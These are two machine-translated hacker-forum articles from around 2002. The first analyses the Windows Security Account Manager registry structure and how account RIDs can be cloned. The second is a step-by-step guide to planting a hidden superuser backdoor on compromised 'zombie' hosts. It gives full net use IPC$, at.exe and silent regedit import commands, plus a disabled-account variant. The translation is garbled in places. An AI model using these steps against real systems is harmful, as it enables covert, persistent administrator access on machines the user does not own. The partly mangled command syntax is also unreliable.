Anatomy of the Security Account Manager (SAM) Structure

Anatomy Security Account Manager (SAM) structure Source: www.opengram.com category: hacker literature date: 6:28:30 today/total views: 1/386

Author: refdom
Email: refdom@263.net
Homepage: www.opengram.com
2002/4/29

I. Summary
Ii. About sam
Iii. Structure of the SAM Database in the Registry
Iv. structure and main content of the SAM Database
V. Conclusion on SAM Database Analysis

I. Summary
The structure of the security account manager was analyzed for more than a month ago. It only recorded fragments in parts and was not released. The main reason for not publishing is that the security account manager (SAM) is the core of win system account management, and it is very systematic. I also have a lot of places to simply make inferences and guesses. At the same time, an error occurred while loading the account manager of lsass.exe during startup of Sam hackable. Even in safe mode, it cannot be fixed (Sam must be loaded during startup), causing the entire system to crash (I usually need to start it by deleting the Sam file from the second system ). As for the current release, it is mainly because Adam and Ding's "clone Administrator Account" described in the rootkit creation method are concealed and harmful, and they are familiar with Sam's structure, it can help security maintenance personnel to perform security detection (which may also be exploited by malicious attackers ).
Here we will only introduce Sam's content, which is not publicly available for the moment.
Ii. About sam
Don't misunderstand Sam. It's not as simple as a file Sam. Security Account Manager (SAM) controls and maintains the SAM Database. The SAM Database is located in the HKLM/SAM/samk registry. With aclprotection, you can use regedt32.exe to open the Registry Editor and set proper permissions to view the contents of Sam. The SAM Database is stored on the disk in the SAM file under the % SystemRoot % system32/config/directory. This directory also contains a security file, which is the content of the security database, there are many relationships between the two.
The SAM Database contains information about all groups and accounts, including password hash and account Sid. These contents are described in detail later. Take the system I analyzed as an example.
Iii. Structure of the SAM Database in the Registry
Expand the Registry HKLM/SAM /:
HKLM---SAM
| --- Sam
| --- Domains
| --- Account
| --- Aliases
| --- Members
| --- Names
| --- Groups
| --- 00000201
| --- Names
| --- None
| --- Users
| --- 000001f4
| --- 000001f5
| --- 000003e8
| --- 000003e9
| --- Names
| --- Adaministrator
| --- Guest
| --- Iusr_refdom
| --- Iwasm_refdom
| --- Builtin
| --- Aliases
||| --- 00000220
||| --- 00000221
||| --- 00000222
||| --- 00000223
| --- Members
| --- S-1-5-21-1214440339-706699826-1708537768
| --- 000001f4
| --- 000001f5
| --- 000003e8
| --- 000003e9
| --- Names
| --- Administrators
| --- Users
| --- Guests
| --- Power Users
| --- Groups
| --- Names
|
| --- Users
| --- Names
|
| --- Rxact
This is the Sam tree in the Registry on my machine.
We can see from the contents of the SAM file that the Sam tree in the registry is actually the same as that in the SAM file. However, the Sam file first columns rxact and then domains (and so on). The expression order in the file is the opposite to the tree sequence in the registry. If you are used to viewing the file content, from the memory H of the file to 0006ch, it indicates the location of the SAM Database:/SYSTEMROOT/system32/config/SAM, and then the end is blank, until 01000 H (hbin), it is the content of the entire database from here. The file content of the SAM Database is not described in detail, but will be interspersed with introductions. If you are interested, you can study it on your own.
Iv. structure and main content of the SAM Database:
In the entire database, the main account content exists in the following locations:
Under/domains/is the Sam content in the domain (or local machine), there are two branches "Account" and "builtin ".
/Domains/account is the content of the user account.
/Domains/account/users is the information of each account. The sub-key is the relative identifier of the SID of each account. For example, 000001f4, each account has two sub-items, F and V. Here,/names/is the user account name. Each account name has only one default subitem, and the type of the item is not a general registry data type, instead, it points to the last item (relative identifier) indicating the SID of this account. For example, the type of the administrator under it is 0x1f4, so the contents of the account name administrator are mapped from the previous 000001f4. This shows the logic for searching MS Accounts.
Inference 1: From the Perspective of the account structure in the registry, if you query the refdom information of an account name, Microsoft finds its type 0x3eb from the account name refdom, then, find the account content with the relative identifier (or Sid) 000003eb. All API functions (such as netuserenum () are executed in this way. Therefore, if the type 0x3eb in the refdom account is changed to 0x1f4, the account will be directed to the account with the class 000001f4
User. This account 000001f4 is the administrator account. In this way, the system transfers the refdom account to the administrator account during logon. All the content and information used by the account refdom are adminisrtator content, including passwords, permissions, desktops, records, and access time. This inference should be true, but it will mean that the two usernames correspond to one user information. An error should occur during system startup!
It is inferred from the previous analysis structure that the relationship between account names and Sid during and after logon is revealed.
/Domains/account/users/000001f4, which is the account information of the Administrator (others are similar ). There are two subitem V and F. Project v stores the basic account information, including the user name and full name), group, description, password hash, comment, whether the password can be changed, account enabling, password setting time, etc. Project F saves some logon records, such as the last logon time and number of wrong logins, and
An important part is the relative identifier of the Account's Sid.
I didn't pay attention to this point when I analyzed the structure. This is what Adam proposed. This is where the relative identifier of this Sid appears twice in an account in the registry. One is in the sub-key 000001f4, and the other is in the sub-key's F content, four bytes from 48 to 51: F4 01 00 00, which is actually a long variable, that is, 00 00 01 F4. Synchronization occurs when a sign appears in two places. Obviously, Microsoft has made this mistake. The two variables should mark a single user account, but Microsoft did not synchronize the two variables.
In the subkey, 000001f4 is used to correspond to the user name "Administrator". It is convenient for users to query account information, such as lookupaccountsid () and other account-related API functions. This location is used to locate user information, this association should be used after account logon. The F4 01 00 in the project V value is most directly associated with account logon.
Conclusion 2: during logon, the relative identifier is obtained from Sam, and the relative identifier is at F4 01 00 in the V value. However, the Sam subkey is used for account information query.
Assumption 2: when the account is logged on, obtain the relative Identifier value (equivalent to F4 01 00 in the V value) in the account record used by the username in the SAM Database during logon. After the account is logged on, this value is no longer used by API functions, and the relative identifier is replaced by the field name of a data record item (equivalent to the sub-key 000001f4 ). Microsoft has made a synchronization logic problem!
Inference 2 is based on Adam's suggestion. It has never been inferred before. (Infer 2 if it is true, it reveals the process of account Sid during logon. This is why the value in V is related to the Account Logon record (logon time, Password error count, etc. At the same time, because f stores a user name and the API function queries this user name, the Adam cloning method is easy to show your face, this user name has also been restored to the original user name, and it is relatively difficult to detect the user name.
You can see the introduction of Project V, where the basic information of the account is saved, the user name, and the full name of the user (full name), group, description, password hash, comment, whether the password can be changed, account enabling, password setting time, etc. Now we are concerned about the password hash.
Suppose 2: item V of the account contains the user hash, including the encryption hash of lm2 and NT, which can be separated during crack. After all, lm2 is simple.

The content in/domains/builtin is related to the account group. Its structure is similar to that under/account, and there are also corresponding problems, so it is no longer arrogant.
The file Sam stored in the SAM database does not have such concise content in the registry, but mainly uses offset and length to locate the content. In addition, the information of a single account is centralized, rather than separated in the form of a registry (one key for the name and the content is in another key ).
In the Sam file, you can locate the data meaning based on the following delimiters:
NK (6e 6b) Key or subkey name
Value corresponding to VK (76 6b)
If (6C 66) subkey list
SK (73 6b) Permission

V. Conclusion on SAM Database Analysis:
Sam hack is very dangerous. Improper modification will damage the system's security data manager and cause system startup problems, although you can delete the Sam file to recover the startup. If you are familiar with the structure of Sam, you will find that you can switch between the user name and the user name, between the user group and the user group, and forge accounts and account groups to completely break the Microsoft account structure. It is also very concealed, so that the account-related API functions are confused.
Although Microsoft has made many logical problems in processing account information, the security account database is not insecure and all operations must have full administrator privileges.
After the concealed backdoor method is proposed, many "hackers" will be allowed to exploit it. The Administrator should also be familiar with related technologies and perform security detection. This is my goal. The simple detection tool for clone Administrator account can be downloaded on my homepage (www.opengram.com). However, the administrator needs to learn more about the tool to better detect intrusions.

 

 

Create a hidden superuser

Source: Unknown category: security document date: 11:22:08 today/total views: 1/1071

 

A few days ago on a website (I can't remember, sorry ^ _ * fuse (Version 3.0) as a command line tool to export and import the Registry file, but after each import, the hidden superuser cannot be used. Then, open the Registry to view the hidden superuser's default data type. Since this data type can be imported by the sixteen bytes, it should also be able to import this type of data under DOS. Later I proved my idea through experiments. The following describes how to create a hidden superuser:
1. How to create hidden superusers on the graphic interface
The graphic interface is applicable to bots running local or 3389 Terminal Services. . In my opinion, this deployment will be applied to the psu.exe program. Because Windows2000 has two registry Editors: regedit.exeand regedt32.exe. In XP, regedit.exeand regedt32.exe are actually a program. You can right-click "permission" to modify the key value permission. Regedt32.exe can be used to set permissions for registry keys. The account information of NT/2000/XP is in the HKEY_LOCAL_MACHINE/SAM/supervisor of the registry. The Sam key is set to "Full Control" for me. In this way, you can read and write the information in the SAM key. The steps are as follows:
1. Assume that we log on to a zombie with terminal services as a Super User administrator. First, create an account under the command line or account manager: hacker $, here I create this account under the command line
Net user hacker $1234/Add
2. Enter regedt32.exein the "Start/Run" command to run regedt32.exe.
3. Click "permission" and a window will pop up.
Click Add to add the account I logged on to the security bar. Here I log on as administrator, So I add the Administrator and set the permission to "full control ". Note: It is best to add the account you are logged on to or the group in which the account is located. do not modify the original account or group. Otherwise, a series of unnecessary problems may occur. And then click here to delete the account you added.
4. Click "start"> "run" and enter "regedit.exe" to go back to start the Registration Table editor regedit.exe.
Open key: hkey_local_maichine/SAM/domains/account/user/names/hacker $"
5. Export the items hacker $, 00000409, and 000001f4 as hacker. reg, 409.reg, 1f4. reg. use NotePad to edit the exported files respectively, and copy the value of the key "F" under the "000001f4" of the Super User, overwrite the value of the key "F" under item 00000409 corresponding to hacker $, and then replace 00000409. reg and hacker. reg merge.
6. Execute net user hacker $/del on the command line to delete user hacker $: Net user hacker $/del
7. In the regedit.exe window, press F5 to refresh, and then press file-import registry file to import modified hacker. reg to registry.
The hacker of the hidden Super User has been created. Then, disable regedit.exe. In the regedt32.exe window, change the HKEY_LOCAL_MACHINE/SAM Key Permission to the original one (you only need to delete the added account administrator ).
9. Note: After a hidden superuser is created, the hacker $ user cannot be seen in the account manager, and the hacker $ user cannot be seen in the command line by running the "Net user" command, but after the superuser is created, you cannot change the password any more. If you use the net user command to change the password of hacker $, you will be able to see this hidden super user in the account manager and cannot delete it.

How to remotely create hidden superusers under the command line
Here, we will use the command of "at.exe", because the scheduled task of "atsag" is to run with the System ID, and the psu.exe program will not be used. The method is also acceptable, as long as the Schedule service can be started.
For the command line method, you can use a variety of connection methods, such as using sqlexec to connect to port 1433 of MSSQL, or using Telnet service, as long as you can get a mongoshell, you can also run the AT command.
1. First, find a zombie. How to find it is not the topic I mentioned here. Assume that a super user with the administrator password and 12345678 is found. Now we can remotely create a hidden super user for the Super User under the command line. (In this example, the host is a host in my lan. I changed its IP address to 13.50.97.238. Do not block the host on the Internet to avoid disturbing the normal IP address .)
2. first establish a connection with the broiler. The command is: net use // 13.50.97.238/IPC $ "12345678"/User: "Administrator
3. Create a user on the chicken by using the atcommand (if the atservice is not started, use netsvc.exeor SC .exe to start it remotely): At // 13.50.97.238
C:/winnt/system32/net.exe user hacker $1234/Add
Create the username with the $ character because after the $ character is added, the user is not displayed with the net user in the command line, but can be seen in the account manager.
4. Use the AT command to export the HKEY_LOCAL_MACHINE/SAM/domains/account/Users Key: At // 13.50.97.238
C:/winnt/regedit.exe/e hacker. Reg HKEY_LOCAL_MACHINE/SAM/domains/account/users/
/E is the parameter of regedit.exe. The key _ LOCAL_MACHINE/SAM/domains/account/users/must end. If necessary, you can quote "C:/winnt/regedit.exe/e hacker. Reg HKEY_LOCAL_MACHINE/SAM/domains/account/users.
5. Download hacker. Reg from the bot to the local machine and use NotePad to open the edit command: Copy // 13.50.97.238/ADMIN $/system32/hacker. Reg
C:/hacker. Reg
The graphic field of the modification method has already been introduced. I will not introduce it here.
6. Copy the edited hacker. Reg back to the zombie and copy C:/hacker. Reg/13.50.97.238/ADMIN $/system32/hacker1.reg
7. view the zombie time: Net time // 13.50.97.238 and run the AT command to delete the user hacker $:
At // 13.50.97.238 13:40 net user hacker $/del
8. Verify whether hacker $ is deleted: Use
Net use // 13.50.97.238/Del.
Net use // 13.50.97.238/IPC $ "1234"/User: "hacker $" Use the account hacker $ to connect to the zombie. If the connection is unavailable, the connection is deleted.
9. Establish a connection with the zombie: net use // 13.50.97.238/IPC $ "12345678"/User: "Administrator"
After obtaining the zombie time, run the AT command to copy the hacker1.reg copy back to the zombie and import it to the zombie registry:
At // 13.50.97.238 13:41 C:/winnt/regedit.exe/s hacker1.reg
The parameter/s of regedit.exe indicates quiet mode.
10. Verify that hacker $ has been created. The method is the same as that for verifying that hacker $ is deleted.
11. Verify whether hacker $ has the read, write, and delete permissions. If you are not at ease, you can also verify whether other accounts can be created.
12. We can conclude through 11 that the user hacker $ has the superuser permission, because it was a common user when I used the AT command to create it, but now it has the permission to read, write, and delete data remotely.
3. What should I do if I don't want to use the command line service because I didn't enable the 3389 Terminal Service for bots?
In this case, you can also use the interface to remotely create hidden superusers for bots. To edit the remote registry. The account manager also provides the function of connecting to another computer. You can use the account manager to create and delete accounts for remote hosts. The specific steps are similar to those described above. I will not talk about them much, but its speed is really intolerable.
However, there are two prerequisites: 1. Use Net use // zombie IP/IPC $ "password"/User: "Super User Name" to establish a connection with the remote host before you can use regedit.exe regedt32.exe and the account manager to connect to the remote host.
2. the remote host must enable the Remote Registry Service (you can also enable it remotely if it is not enabled because you have a superuser password ).
4. Use a Disabled Account to create a hidden superuser:
We can use forbidden users on bots to create a hidden superuser group. The method is as follows:
1. Find out which users are forbidden by careful administrators. In general, some administrators usually disable guest for security reasons. Of course, other users are disabled. In the graphical interface, it is very easy to see that there is a red cross on the Disabled Account in the account manager; but under the command line, I have not come up with a good way, you can only run the "Net user username" command on the command line to check whether a user is disabled.
2. Here, we assume that the user hacker is disabled by the Administrator. First, I first used the super-user clone program ca.exe of small Banyan to clone the disabled user hacker into a Super User (After cloning, the disabled user hacker will be automatically activated): ca. EXE // zombie IP administrator Superuser password hacher password.
3. If you have an existing shell, such as using telnet or sqlexec to connect to the default port 1433 of MSSQL for broilers, you can run the following command:
Net user hacker/active: No, so that the user hacker is disabled (at least on the surface). Of course, you can also change the user hacher to another disabled user.
4. If you look at the user in the account manager in the graphical interface, you will find that the user hacker is disabled, but is it actually like this? You can use this disabled user to connect to a zombie to see if it can be connected? Run the following command: Net user // zombie IP/IPC $ "hacker password"/User: "hacker" to check whether the connection is successful. I can tell you that, after many experiments, I have been able to succeed for the next time, and I am still a Super User Privilege.
5. What if there is no shell? You can use the AT command described above to Disable User hacker. Command Format: At // zombie IP address time. Net user hacker/active: No
6. Principle. You can disable Super User administrator in account manager on the graphic interface. A dialog box is displayed, and Super User administrator cannot be disabled. Similarly, when cloning, the "F" Key of hacker in the registry is replaced by the "f" Key of the Super User administrator in the registry. Therefore, hacker has the permissions of the Super User, however, because hacker still uses the original "C" key in the registry, hacker will still be disabled, but its super user permissions will not be disabled, therefore, the disabled user hacker can still connect to bots and has the permissions of Super Users. I cannot understand it either. You can understand it in this way.
5. Notes:
1. After a hidden superuser is created, the user is invisible in the account manager and in the command line, but the user exists.
2. After a hidden Super User is created, the password cannot be changed because the hidden Super User is exposed to the account manager and cannot be deleted.
3. When testing on the local machine, it is best to use the backup tool that comes with the system to back up the "system status" of the local machine first. This is mainly a registry backup, because I did the test, the account manager has never seen any users, nor any groups in the group, but they exist. Fortunately, I have a backup. The Sam key is, after all, the most sensitive part of the system.
4. This method is successfully tested on 2000/XP and not nt. This method is for research only. Do not use this method for damage. Users are responsible for the use of this method to cause serious consequences. I am not responsible for this method.